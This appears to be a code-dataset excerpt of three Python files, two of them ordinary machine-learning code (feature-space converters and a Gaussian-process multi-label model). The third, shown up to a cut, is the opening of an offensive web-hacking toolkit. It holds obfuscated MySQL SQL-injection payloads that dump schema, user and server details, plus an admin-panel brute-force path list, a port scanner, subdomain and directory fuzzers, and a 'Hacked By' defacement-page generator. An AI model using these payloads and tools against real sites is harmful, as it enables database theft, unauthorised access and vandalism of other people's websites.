"`UniformFloatHyperparameter` are supported!")
size_sparse = src_ind + 1
size_dense = trg_ind
return nums, ords, cats, size_sparse, size_dense, categories
def feature_to_array(self, x_feature, sparse_dim):
'''
return sparse array for construct Configurations
'''
assert not (self.dtypes_idx_map is None)
x_array = np.empty(shape=(sparse_dim))
for dtype, array_idx_map in self.dtypes_idx_map.items():
if array_idx_map.src_ids is None:
continue
if dtype == 'cat':
for src_ind, trg_ind, size in (array_idx_map.cats):
x_array[src_ind] = \
self.cat.feature_to_sparse_array(
x_feature[trg_ind:trg_ind + size], size
)
elif dtype == 'ord':
for src_ind, trg_ind, size in (array_idx_map.cats):
x_array[src_ind] = \
self.ord.feature_to_sparse_array(
x_feature[trg_ind:trg_ind + size], size
)
# x_array[array_idx_map.src_ids] = \
# self.ord.feature_to_sparse_array(
# x_feature[array_idx_map.trg_ids],
# )
elif dtype in ('float', 'int'):
for src_ind, trg_ind, size in (array_idx_map.cats):
x_array[src_ind] = \
self.unif.feature_to_sparse_array(
x_feature[trg_ind:trg_ind + size], size
)
else:
pass
return x_array
def array_to_feature(self, array, dense_dim): # TODO
warnings.warn("This method may no reason be called?")
assert not (self.dtypes_idx_map is None)
feature = np.zeros(shape=(dense_dim))
for dtype, array_idx_map in self.dtypes_idx_map.items():
# if array_idx_map.src_ids:
if array_idx_map.src_ids is None:
continue
if dtype == 'cat':
# for src_ind, trg_ind, size in (array_idx_map.cats):
for src_ind, trg_ind, size in (array_idx_map.cats):
feature[trg_ind:trg_ind+size] = \
self.cat.sparse_array_to_feature(
array[src_ind], size
)
elif dtype == 'ord':
for src_ind, trg_ind, size in (array_idx_map.cats):
feature[trg_ind:trg_ind+size] = \
self.ord.sparse_array_to_feature(
array[src_ind], size
)
elif dtype in ('float', 'int'):
for src_ind, trg_ind, size in (array_idx_map.cats):
feature[trg_ind:trg_ind+size] = \
self.unif.sparse_array_to_feature(
array[src_ind], size
)
else:
pass
return feature
def record_feature(self, feature):
self.features_.append(feature)
class FeatureSpace_uniform(AbstractFeatureSpace):
'''
sparse array <=> feature space
all variable i.i.d ~ U(0, 1)
'''
def __init__(self, dtypes_idx_map):
super().__init__()
self.dtypes_idx_map = dtypes_idx_map
self.unif = Identity()
self.cat = Cat2Onehot()
self.ord = Ord2Uniform()
self.features_ = []
def feature_to_array(self, x_feature, sparse_dim):
'''
return sparse array for construct Configurations
'''
assert not (self.dtypes_idx_map is None)
x_array = np.empty(shape=(sparse_dim))
for dtype, array_idx_map in self.dtypes_idx_map.items():
if array_idx_map.src_ids is None:
continue
if dtype == 'cat':
for src_ind, trg_ind, size in (array_idx_map.cats):
x_array[src_ind] = \
self.cat.feature_to_sparse_array(
x_feature[trg_ind:trg_ind + size], size
)
elif dtype == 'ord':
for src_ind, trg_ind, size in (array_idx_map.cats):
x_array[src_ind] = \
self.ord.feature_to_sparse_array(
x_feature[trg_ind], size
)
# x_array[array_idx_map.src_ids] = \
# self.ord.feature_to_sparse_array(
# x_feature[array_idx_map.trg_ids],
# )
elif dtype in ('float', 'int'):
x_array[array_idx_map.src_ids] = \
self.unif.feature_to_sparse_array(
x_feature[array_idx_map.trg_ids]
)
else:
pass
return x_array
def array_to_feature(self, array, dense_dim): # TODO
warnings.warn("This method may no reason be called?")
assert not (self.dtypes_idx_map is None)
feature = np.zeros(shape=(dense_dim))
for dtype, array_idx_map in self.dtypes_idx_map.items():
# if array_idx_map.src_ids:
if array_idx_map.src_ids is None:
continue
if dtype == 'cat':
# for src_ind, trg_ind, size in (array_idx_map.cats):
for src_ind, trg_ind, size in (array_idx_map.cats):
feature[trg_ind:trg_ind+size] = \
self.cat.sparse_array_to_feature(
array[src_ind], size
)
elif dtype == 'ord':
for src_ind, trg_ind, size in (array_idx_map.cats):
feature[trg_ind] = \
self.ord.sparse_array_to_feature(
array[src_ind], size
)
elif dtype in ('float', 'int'):
feature[array_idx_map.trg_ids] = \
self.unif.sparse_array_to_feature(
array[array_idx_map.src_ids]
)
else:
pass
return feature
def record_feature(self, feature):
self.features_.append(feature)
class FeatureSpace_gaussian(AbstractFeatureSpace):
'''
sparse array <=> feature space
all variable i.i.d ~ Normal distribution N(0, 1)
'''
def __init__(self, dtypes_idx_map):
super().__init__()
self.dtypes_idx_map = dtypes_idx_map
self.unif = U2gaussian()
self.cat = Category()
self.ord = Ordinal()
self.features_ = []
def feature_to_array(self, x_feature, sparse_dim):
'''
return sparse array for construct Configurations
'''
assert not (self.dtypes_idx_map is None)
x_array = np.empty(shape=(sparse_dim))
for dtype, array_idx_map in self.dtypes_idx_map.items():
if array_idx_map.src_ids is None:
continue
if dtype == 'cat':
for src_ind, trg_ind, size in (array_idx_map.cats):
x_array[src_ind] = \
self.cat.feature_to_sparse_array(
x_feature[trg_ind:trg_ind + size], size
)
elif dtype == 'ord':
for src_ind, trg_ind, size in (array_idx_map.cats):
x_array[src_ind] = \
self.ord.feature_to_sparse_array(
x_feature[trg_ind], size
)
# x_array[array_idx_map.src_ids] = \
# self.ord.feature_to_sparse_array(
# x_feature[array_idx_map.trg_ids],
# )
elif dtype in ('float', 'int'):
x_array[array_idx_map.src_ids] = \
self.unif.feature_to_sparse_array(
x_feature[array_idx_map.trg_ids]
)
else:
pass
return x_array
def array_to_feature(self, array, dense_dim): # TODO
warnings.warn("This method may no reason be called?")
assert not (self.dtypes_idx_map is None)
feature = np.zeros(shape=(dense_dim))
for dtype, array_idx_map in self.dtypes_idx_map.items():
# if array_idx_map.src_ids:
if array_idx_map.src_ids is None:
continue
if dtype == 'cat':
# for src_ind, trg_ind, size in (array_idx_map.cats):
for src_ind, trg_ind, size in (array_idx_map.cats):
feature[trg_ind:trg_ind+size] = \
self.cat.sparse_array_to_feature(
array[src_ind], size
)
elif dtype == 'ord':
for src_ind, trg_ind, size in (array_idx_map.cats):
feature[trg_ind] = \
self.ord.sparse_array_to_feature(
array[src_ind], size
)
elif dtype in ('float', 'int'):
feature[array_idx_map.trg_ids] = \
self.unif.sparse_array_to_feature(
array[array_idx_map.src_ids]
)
else:
pass
return feature
def record_feature(self, feature):
self.features_.append(feature)
class Uniform2Gaussian(AbstractFeatureSpace):
def __init__(self):
super().__init__()
def array_to_feature(self, array):
return stats.norm.ppf(array)
def feature_to_array(self, feature):
return stats.norm.cdf(feature) |
py | b41534707893d45f1d5aa0c66560464f82b37651 | from typing import Optional, Tuple, TypeVar
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
import sys
import os
from itertools import product
from gpflow.base import Module, Parameter
from gpflow.config import default_float, default_jitter, set_default_float
from gpflow.utilities import ops, positive, triangular
Data = TypeVar('Data', Tuple[tf.Tensor, tf.Tensor], tf.Tensor)
class MLGPF_model(Module):
def __init__(self,
num_points: int,
num_labels: int,
num_dim: int,
num_factors: int = 30,
num_inducings: int = 400,
lengthscales: tf.Tensor = None,
Z_init: tf.Tensor = None,
jitter: np.float = 1e-6,
q_mu: tf.Tensor = None,
q_sqrt: tf.Tensor = None,
use_se: bool = False,
use_linear: bool = False,
use_se_plus_linear: bool = False,
N_GH: int = 10):
x_gh, w_gh = np.polynomial.hermite.hermgauss(N_GH)
self.x_gh_3d, self.w_gh = tf.cast(np.sqrt(2)*x_gh[:, np.newaxis, np.newaxis], dtype=default_float()), tf.cast(w_gh / np.sqrt(np.pi), dtype=default_float())
self.jitter_eye = tf.cast(jitter*np.eye(num_inducings), dtype=default_float())
self.num_points = tf.cast(num_points, dtype=default_float())
self.const_PM = tf.cast(num_factors*num_inducings, dtype=default_float())
self.const_P = tf.cast(num_factors, dtype=default_float())
self.M_ones = tf.ones([num_inducings, 1], dtype=default_float())
self.P_ones_2d = tf.ones([num_factors, 1], dtype=default_float())
self.P_ones_3d = tf.ones([num_factors, 1 ,1], dtype=default_float())
self.use_se = use_se
self.use_linear = use_linear
self.use_se_plus_linear = use_se_plus_linear
lengthscales = np.ones(num_dim) if lengthscales is None else lengthscales
q_mu = 0.5 * np.ones((num_inducings, num_factors)) if q_mu is None else q_mu
q_sqrt = tfp.math.fill_triangular_inverse(np.array([0.2*np.eye(num_inducings) for _ in range(num_factors)])) if q_sqrt is None else q_sqrt
Z_init = 0.2 * tf.np.random.rand(num_inducings, num_dim) if Z_init is None else Z_init
if lengthscales.size != num_dim:
print('Dimension mismatch: Variable \"lengthscales\" must be of size ({},)' .format(num_dim) )
sys.exit(1)
if q_mu.shape[0] != num_inducings or q_mu.shape[1] != num_factors:
print('Dimension mismatch: Variable \"q_mu\" must be of size ({},{})' .format(num_inducings, num_factors) )
sys.exit(1)
if q_sqrt.shape[0] != num_factors or q_sqrt.shape[1] != int(0.5*num_inducings*(num_inducings + 1)):
print('Dimension mismatch: Variable \"q_sqrt\" must be of size ({},{})' .format(num_factors, int(0.5*num_inducings*(num_inducings + 1))) )
sys.exit(1)
if Z_init.shape[0] != num_inducings or Z_init.shape[1] != num_dim:
print('Dimension mismatch: Variable \"Z_init\" must be of size ({},{})' .format(num_inducings, num_dim) )
sys.exit(1)
self.Phi = Parameter(np.random.randn(num_labels, num_factors)/np.sqrt(num_factors), dtype=default_float())
self.bias_vec = Parameter(np.random.randn(num_labels, 1)/np.sqrt(num_factors), dtype=default_float())
self.Z_unorm = Parameter(Z_init, dtype=default_float())
self.lengthscales = Parameter(lengthscales, transform=positive(), dtype=default_float())
self.q_mu = Parameter(q_mu, dtype=default_float())
self.q_sqrt = Parameter(q_sqrt, dtype=default_float())
if self.use_se_plus_linear:
self.se_var = Parameter(1., transform=positive(), dtype=default_float())
self.linear_var = Parameter(1., transform=positive(), dtype=default_float())
def se_kernel(self, batch_X):
Z_norm = tf.nn.l2_normalize(self.Z_unorm, 1)
Z_norm_ells_T = tf.transpose(Z_norm*self.lengthscales) # D x M
Xb_Lambda = batch_X.__mul__(self.lengthscales)
Z_dot_Z = tf.linalg.matmul(Z_norm_ells_T, Z_norm_ells_T, transpose_a=True) # M x M
X_dot_Z = tf.sparse.sparse_dense_matmul(Xb_Lambda, Z_norm_ells_T) # minibatch x M
Z_mul_sum = tf.linalg.diag_part(Z_dot_Z) # (M, )
H_p = self.M_ones * Z_mul_sum
A_p = H_p + tf.transpose(H_p) - 2.*Z_dot_Z
A_k2_tmp = tf.sparse.reduce_sum(tf.square(Xb_Lambda), 1) - 2.*tf.transpose(X_dot_Z) # M x minibatch
A_k2 = tf.transpose(A_k2_tmp) + Z_mul_sum # minibatch x M
K_mm = tf.exp(-A_p) + self.jitter_eye # M x M
K_mn = tf.exp(-A_k2) # minibatch_size x M
K_mn = tf.transpose(K_mn) # M x minibatch_size
return K_mm, K_mn, 1.
def linear_kernel(self, batch_X):
Z_norm = tf.nn.l2_normalize(self.Z_unorm, 1)
Z_norm_ells_T = tf.transpose(Z_norm*self.lengthscales) # D x M
Xb_Lambda = batch_X.__mul__(self.lengthscales)
Xb_Lambda_sq_sum = tf.sparse.reduce_sum(tf.square(Xb_Lambda), 1)
K_mm = tf.linalg.matmul(Z_norm_ells_T, Z_norm_ells_T, transpose_a=True) + self.jitter_eye # M x M
K_mn = tf.sparse.sparse_dense_matmul(Xb_Lambda, Z_norm_ells_T) # minibatch x M
K_mn = tf.transpose(K_mn) # M x minibatch_size
return K_mm, K_mn, Xb_Lambda_sq_sum
def se_plus_linear_kernel(self, batch_X):
denom = self.se_var + self.linear_var
norm_se_var, norm_linear_var = self.se_var / denom, self.linear_var / denom
Z_norm = tf.nn.l2_normalize(self.Z_unorm, 1)
Z_norm_ells_T = tf.transpose(Z_norm*self.lengthscales) # D x M
Xb_Lambda = batch_X.__mul__(self.lengthscales)
Z_dot_Z = tf.linalg.matmul(Z_norm_ells_T, Z_norm_ells_T, transpose_a=True) # M x M
X_dot_Z = tf.sparse.sparse_dense_matmul(Xb_Lambda, Z_norm_ells_T) # minibatch x M
Z_dot_X = tf.transpose(X_dot_Z) # M x minibatch_size
Xb_Lambda_sq_sum = tf.sparse.reduce_sum(tf.square(Xb_Lambda), 1)
Z_mul_sum = tf.linalg.diag_part(Z_dot_Z) # (M, )
H_p = self.M_ones * Z_mul_sum
A_p = H_p + tf.transpose(H_p) - 2.*Z_dot_Z
A_k2_tmp = Xb_Lambda_sq_sum - 2.*Z_dot_X # M x minibatch
A_k2 = tf.transpose(A_k2_tmp) + Z_mul_sum # minibatch x M
K_mm = norm_se_var * tf.exp(-A_p) + norm_linear_var * Z_dot_Z + self.jitter_eye # M x M
K_mn = norm_se_var * tf.exp(-A_k2) # minibatch_size x M
K_mn = tf.transpose(K_mn) + norm_linear_var * Z_dot_X # M x minibatch_size
return K_mm, K_mn, norm_linear_var * Xb_Lambda_sq_sum + norm_se_var
def neg_elbo(self, batch_XY) -> tf.Tensor:
mask_minus_ones = tf.where(tf.sparse.to_dense(batch_XY[1]), -1, 1)
mask_minus_ones = tf.transpose(mask_minus_ones)
mask_minus_ones = tf.cast(mask_minus_ones, default_float())
q_sqrt_transf = tfp.math.fill_triangular(self.q_sqrt)
if self.use_linear :
K_mm, K_mn, var_kern = self.linear_kernel(batch_XY[0])
elif self.use_se_plus_linear:
K_mm, K_mn, var_kern = self.se_plus_linear_kernel(batch_XY[0])
else:
K_mm, K_mn, var_kern = self.se_kernel(batch_XY[0])
Lp = tf.linalg.cholesky(K_mm) # M x M
alpha = tf.linalg.triangular_solve(Lp, self.q_mu, lower=True) # M x P
Lq_diag = tf.linalg.diag_part(q_sqrt_transf) # P x M
Lp_full = self.P_ones_3d*Lp[None, :, :] # P x M x M
LpiLq = tf.linalg.triangular_solve(Lp_full, q_sqrt_transf, lower=True) # M x P
sum_log_sqdiag_Lp = tf.reduce_sum(tf.math.log(tf.square(tf.linalg.diag_part(Lp))))
KL_div = 0.5 * (self.const_P * sum_log_sqdiag_Lp + tf.reduce_sum(tf.square(alpha)) - self.const_PM - tf.reduce_sum(tf.math.log(tf.square(Lq_diag))) + tf.reduce_sum(tf.square(LpiLq)))
A = tf.linalg.triangular_solve(Lp, K_mn, lower=True) # M x minibatch_size
fvar = var_kern - tf.reduce_sum(tf.square(A), 0) # minibatch_size
fvar = self.P_ones_2d*fvar[None, :] # P x minibatch_size
A = tf.linalg.triangular_solve(tf.transpose(Lp), A, lower=False) # M x minibatch_size
fmean = tf.linalg.matmul(A, self.q_mu, transpose_a=True) # minibatch_size x P - Marginal mean
A = self.P_ones_3d*A[None, :, :] # P x M x minibatch_size
LTA = tf.linalg.matmul(q_sqrt_transf, A, transpose_a=True) # P x M x minibatch_size
fvar = fvar + tf.reduce_sum(tf.square(LTA), 1) # P x minibatch_size - Marginal variance
# Expectations computation
sum_dot_phi = (tf.linalg.matmul(self.Phi, fmean, transpose_b=True) + self.bias_vec)*mask_minus_ones # K x minibatch_size
sum_dot_phi_sqrt = tf.math.sqrt(tf.matmul(tf.square(self.Phi), fvar))*mask_minus_ones # K x minibatch_size
sum_dot_phi_sqrt = tf.expand_dims(sum_dot_phi_sqrt, 0)
sum_E_q_all = tf.reduce_sum(self.w_gh * tf.reduce_sum(tf.nn.softplus(sum_dot_phi - self.x_gh_3d*sum_dot_phi_sqrt), [1, 2]))
scale = self.num_points / tf.cast(tf.shape(fvar)[1], default_float())
return scale * sum_E_q_all + 0.5 * KL_div
def predict_scores(self, X_test) -> tf.Tensor:
if self.use_linear :
K_mm_test, K_mn_test, _ = self.linear_kernel(X_test)
elif self.use_se_plus_linear:
K_mm_test, K_mn_test, _ = self.se_plus_linear_kernel(X_test)
else:
K_mm_test, K_mn_test, _ = self.se_kernel(X_test)
Lp_test = tf.linalg.cholesky(K_mm_test)
A_test = tf.linalg.triangular_solve(Lp_test, K_mn_test, lower=True) # M x n_test
A_test = tf.linalg.triangular_solve(tf.transpose(Lp_test), A_test, lower=False) # M x n_test
fmean_test = tf.matmul(A_test, self.q_mu, transpose_a=True) # n_test x P
return tf.matmul(fmean_test, self.Phi, transpose_b=True) + tf.squeeze(self.bias_vec) # n_test x K
|
py | b41534bf301834e33448613f5b1dbe465e42d53f | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Script Created By:
LinterexEvil Community
Github:
https://github.com/LinterexEvilCommunity
Follow us On Instagram:
@linterexevilcommunityofficial
Buy Me A Coffee:
My Block chain adress:1JbGADGXhL89LoTKWBrbjgSVcFEPatdVEj
Copyrights:
LinterexEvil Community 2020
MIT LICENSE
Special Mentions:
PenHackers PH
Blood Security Hackers
LinterexEvil Community
"""
import os
import sys
import platform
import time
import datetime
import re
import threading
import socket
import webbrowser
import hashlib
import random
import subprocess
import zipfile
if sys.version_info[0] == 3:
from urllib.parse import urlparse
elif sys.version_info[0] == 2:
from urlparse import urlparse
try:
import colorama
colorama.init()
except:
print ('[!] - Module (colorama) not installed!')
sys.exit()
try:
import requests
from requests.exceptions import ConnectionError
except:
print ('[!] - Module (requests) not installed!')
sys.exit()
try:
import whois
except:
print ('[!] - Module (python-whois) not installed!')
sys.exit()
try:
import dns.resolver
except:
print ('[!] - Module (dnspython) not installed!')
sys.exit()
try:
from bs4 import BeautifulSoup
except:
print ('[!] - Module (bs4) not installed!')
sys.exit()
try:
import shodan
except:
print ('[!] - Module (shodan) not installed!')
sys.exit()
#########################################################################################################################################################
# GLOBAL
FNULL = open(os.devnull, 'w')
google_hacking = 'https://www.google.com/search?q='
dios1 = '(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(InFoRMAtiON_sCHeMa.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c7374726f6e672069643d2250757265426c6f6f64223e5461626c653a20,TaBLe_nAMe,0x203d3d20,column_name,0x3c2f7374726f6e673e3c62723e))))a)'
sqli_payload_hostname = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@hostname,0x3c2f7374726f6e673e)'
sqli_payload_tmpdir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@tmpdir,0x3c2f7374726f6e673e)'
sqli_payload_datadir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@datadir,0x3c2f7374726f6e673e)'
sqli_payload_version = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@version,0x3c2f7374726f6e673e)'
sqli_payload_basedir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@basedir,0x3c2f7374726f6e673e)'
sqli_payload_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,user(),0x3c2f7374726f6e673e)'
sqli_payload_database = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,database(),0x3c2f7374726f6e673e)'
sqli_payload_schema = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,schema(),0x3c2f7374726f6e673e)'
sqli_payload_uuid = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,UUID(),0x3c2f7374726f6e673e)'
sqli_payload_system_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,system_user(),0x3c2f7374726f6e673e)'
sqli_payload_session_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,session_user(),0x3c2f7374726f6e673e)'
sqli_payload_symlink = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@GLOBAL.have_symlink,0x3c2f7374726f6e673e)'
sqli_payload_ssl = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@GLOBAL.have_ssl,0x3c2f7374726f6e673e)'
sqli_dump_column_payload = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,<column>,0x3c2f7374726f6e673e)'
## Color
reset = '\033[0m'
bold = '\033[1m'
underline = '\033[4m'
### Fore
black = '\033[90m'; red = '\033[91m'; green = '\033[92m'; yellow = '\033[93m'; blue = '\033[94m'; magenta = '\033[95m'; cyan = '\033[96m'; white = '\033[97m'
### Background
bg_black = '\033[90m'; bg_red = '\033[91m'; bg_green = '\033[92m'; bg_yellow = '\033[93m'; bg_blue = '\033[94m'; bg_magenta = '\033[95m'; bg_cyan = '\033[96m'; bg_white = '\033[97m'
## Configuration
if platform.system() == 'Windows':
from ctypes import windll, create_string_buffer
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
if res:
try:
import struct
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
except:
print("[!] - Module (struct) not installed!")
else:
sizex, sizey = 80, 25
elif platform.system() == 'Linux' or platform.system() == 'Darwin':
sizey, sizex = os.popen('stty size', 'r').read().split()
else:
sizex = 50
## Date Time
month = datetime.date.today().strftime("%B")
if datetime.date.today().strftime("%w") == 1 or datetime.date.today().strftime("%w") == '1':
day = 'Monday'
elif datetime.date.today().strftime("%w") == 2 or datetime.date.today().strftime("%w") == '2':
day = 'Tuesay'
elif datetime.date.today().strftime("%w") == 3 or datetime.date.today().strftime("%w") == '3':
day = 'Wednesday'
elif datetime.date.today().strftime("%w") == 4 or datetime.date.today().strftime("%w") == '4':
day = 'Thursday'
elif datetime.date.today().strftime("%w") == 5 or datetime.date.today().strftime("%w") == '5':
day = 'Friday'
elif datetime.date.today().strftime("%w") == 6 or datetime.date.today().strftime("%w") == '6':
day = 'Saturday'
elif datetime.date.today().strftime("%w") == 7 or datetime.date.today().strftime("%w") == '0':
day = 'Sunday'
mday = datetime.date.today().strftime("%d")
year = datetime.date.today().strftime("%Y")
current_datetime = datetime.datetime.now()
current_time = current_datetime.strftime('%I:%M:%S')
## List
ids = [
'NONE','A','NS','MD','MF','CNAME','SOA','MB','MG','MR','NULL','WKS','PTR','HINFO','MINFO','MX','TXT','RP','AFSDB','X25','ISDN','RT','NSAP','NSAP-PTR','SIG','KEY','PX','GPOS','AAAA','LOC','NXT','SRV','NAPTR','KX','CERT','A6','DNAME','OPT','APL','DS','SSHFP','IPSECKEY','RRSIG','NSEC','DNSKEY','DHCID','NSEC3','NSEC3PARAM','TLSA','HIP','CDS','CDNSKEY','CSYNC','SPF','UNSPEC','EUI48','EUI64','TKEY','TSIG','IXFR','AXFR','MAILB','MAILA','ANY','URI','CAA','TA','DLV'
]
admin_panel_list = ['/admin.aspx','/admin.asp','/admin.php','/admin/','/administrator/','/moderator/','/webadmin/','/adminarea/','/bb-admin/','/adminLogin/','/admin_area/','/panel-administracion/','/instadmin/','/memberadmin/','/administratorlogin/','/adm/','/admin/account.php','/admin/index.php','/admin/login.php','/admin/admin.php','/admin/account.php','/joomla/administrator','/login.php','/admin_area/admin.php','/admin_area/login.php','/siteadmin/login.php','/siteadmin/index.php','/siteadmin/login.html','/admin/account.html','/admin/index.html','/admin/login.html','/admin/admin.html','/admin_area/index.php','/bb-admin/index.php','/bb-admin/login.php','/bb-admin/admin.php','/admin/home.php','/admin_area/login.html','/admin_area/index.html','/admin/controlpanel.php','/admincp/index.asp','/admincp/login.asp','/admincp/index.html','/admin/account.html','/adminpanel.html','/webadmin.html','webadmin/index.html','/webadmin/admin.html','/webadmin/login.html','/admin/admin_login.html','/admin_login.html','/panel-administracion/login.html','/admin/cp.php','cp.php','/administrator/index.php','/administrator/login.php','/nsw/admin/login.php','/webadmin/login.php','/admin/admin_login.php','/admin_login.php','/administrator/account.php','/administrator.php','/admin_area/admin.html','/pages/admin/admin-login.php','/admin/admin-login.php','/admin-login.php','/bb-admin/index.html','/bb-admin/login.html','/bb-admin/admin.html','/admin/home.html','/modelsearch/login.php','/moderator.php','/moderator/login.php','/moderator/admin.php','/account.php','/pages/admin/admin-login.html','/admin/admin-login.html','/admin-login.html','/controlpanel.php','/admincontrol.php','/admin/adminLogin.html','/adminLogin.html','/admin/adminLogin.html','/home.html','/rcjakar/admin/login.php','/adminarea/index.html','/adminarea/admin.html','/webadmin.php','/webadmin/index.php','/webadmin/admin.php','/admin/controlpanel.html','/admin.html','/admin/cp.html','cp.html','/adminpanel.php','/moderator.html','/administrator/index.html','/administrator/login.html','/user.html','/administrator/account.html','/administrator.html','/login.html','/modelsearch/login.html','/moderator/login.html','/adminarea/login.html','/panel-administracion/index.html','/panel-administracion/admin.html','/modelsearch/index.html','/modelsearch/admin.html','/admincontrol/login.html','/adm/index.html','/adm.html','/moderator/admin.html','/user.php','/account.html','/controlpanel.html','/admincontrol.html','/panel-administracion/login.php','/wp-login.php','/adminLogin.php','/admin/adminLogin.php','/home.php','/adminarea/index.php','/adminarea/admin.php','/adminarea/login.php','/panel-administracion/index.php','/panel-administracion/admin.php','/modelsearch/index.php','/modelsearch/admin.php','/admincontrol/login.php','/adm/admloginuser.php','/admloginuser.php','/admin2.php','/admin2/login.php','/admin2/index.php','adm/index.php','adm.php','affiliate.php','/adm_auth.php ','/memberadmin.php','/administratorlogin.php','/login/admin.asp','/admin/login.asp','/administratorlogin.asp','/login/asmindstrator.asp','/admin/login.aspx','/login/admin.aspx','/administartorlogin.aspx','login/administrator.aspx','/adminlogin.asp','a/dminlogin.aspx','/admin_login.asp','/admin_login.aspx','/adminhome.asp','/adminhome.aspx''/administrator_login.asp','/administrator_login.aspx']
admin_panel_valid = []
dbms_errors = {
'MySQL': (r'SQL syntax.*MySQL', r'Warning.*mysql_.*', r'MySQL Query fail.*', r'SQL syntax.*MariaDB server'),
'PostgreSQL': (r'PostgreSQL.*ERROR', r'Warning.*\Wpg_.*', r'Warning.*PostgreSQL'),
'Microsoft SQL Server': (r'OLE DB.* SQL Server', r'(\W|\A)SQL Server.*Driver', r'Warning.*odbc_.*', r'Warning.*mssql_', r'Msg \d+, Level \d+, State \d+', r'Unclosed quotation mark after the character string', r'Microsoft OLE DB Provider for ODBC Drivers'),
'Microsoft Access': (r'Microsoft Access Driver', r'Access Database Engine', r'Microsoft JET Database Engine', r'.*Syntax error.*query expression'),
'Oracle': (r'\bORA-[0-9][0-9][0-9][0-9]', r'Oracle error', r'Warning.*oci_.*', 'Microsoft OLE DB Provider for Oracle'),
'IBM DB2': (r'CLI Driver.*DB2', r'DB2 SQL error'),
'SQLite': (r'SQLite/JDBCDriver', r'System.Data.SQLite.SQLiteException'),
'Informix': (r'Warning.*ibase_.*', r'com.informix.jdbc'),
'Sybase': (r'Warning.*sybase.*', r'Sybase message')
}
## Threading Object Funtions
def TCP_connect(ip, port_number, delay, output):
TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
TCPsock.settimeout(delay)
try:
TCPsock.connect((ip, port_number))
output[port_number] = 'Open'
except:
output[port_number] = ''
def dns_record_scanner(drs_hostname, ids_item, dns_record_list):
try:
answers = dns.resolver.query(drs_hostname, ids_item)
for rdata in answers:
ids_item = str(ids_item); rdata = str(rdata)
dns_record_list.append(str(ids_item + ' : ' + rdata))
except Exception:
print("The scanner Error has happened, we will continue")
pass
def subdomain_scanner(subdomain, so_200, so_301, so_302, so_403):
subdomain = 'http://' + subdomain
try:
subdomain_scanner_request = requests.get(subdomain)
subdomain_scanner_code = subdomain_scanner_request.status_code
if subdomain_scanner_code == 200:
so_200.append(subdomain)
elif subdomain_scanner_code == 301:
so_301.append(subdomain)
elif subdomain_scanner_code == 302:
so_302.append(subdomain)
elif subdomain_scanner_code == 403:
so_403.append(subdomain)
except ConnectionError:
print("Connection Error has happened, we will continue")
pass
def directory_scanner(ds_url_list, directory_fuzz_final1, directory_fuzz_final2, directory_fuzz_final3):
try:
directory_fuzz_request = requests.get(ds_url_list)
if directory_fuzz_request.status_code == 200:
directory_fuzz_final1.append(ds_url_list)
elif directory_fuzz_request.status_code == 301 or directory_fuzz_request.status_code == 302:
directory_fuzz_final2.append(ds_url_list)
elif directory_fuzz_request.status_code == 403:
directory_fuzz_final3.append(ds_url_list)
except:
print("Scanner Error has happened, we will continue")
pass
def file_scanner(fs_url_list, file_fuzz_final1, file_fuzz_final2, file_fuzz_final3):
try:
file_fuzz_request = requests.get(fs_url_list)
if file_fuzz_request.status_code == 200:
file_fuzz_final1.append(fs_url_list)
elif file_fuzz_request.status_code == 301 or file_fuzz_request.status_code == 302:
file_fuzz_final2.append(fs_url_list)
elif file_fuzz_request.status_code == 403:
file_fuzz_final3.append(fs_url_list)
except:
print("Scanner Issue has arised, we will continue")
pass
# END GLOBAL
#########################################################################################################################################################
class Generator:
def deface_page(self, title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups):
deface_page_template = '''
<html>
<head>
<title>--=[ Hacked By {0} ]=--</title>
<meta charset=\"UTF-8\">
<link rel=\"SHORTCUT ICON\" href=\"{1}\">
<meta name=\"Author\" content=\"LinterexCommunity | PureHackers x Blood Security Hackers\"/>
<meta name=\"copyright\" content=\"PureHackers | LinterexCommunity | Blood Security Hackers\"/>
<meta name=\"description\" content=\"{2}.\"/> <!-- Change this -->
<meta name=\"keywords\" content=\"Hacked, Pawned, Defaced, Security, PureHackers, Blood Security Hackers, PureBlood,LinterexEvilCommunity\"/> <!-- Change this -->
<meta property=\"og:title\" content=\"Hacked By {0}\"/>
<meta property=\"og:image\" content=\"{3}\"> <!-- Change this -->
<style>
{9} url(\"https://cr4shcod3.github.io/python/pureblood/pureblood.css\");
</style>
</head>
<body>
<div class=\"bg\">
<center>
<img src=\"{4}\" class=\"logo\"/> <!-- Change This -->
<h1 class=\"header glitch\" data-text=\"Hacked By {5}\">Hacked By {5}</h1><br><br>
<p class=\"message\">{6}</p>
<p class=\"message\">{7}</p><br><br>
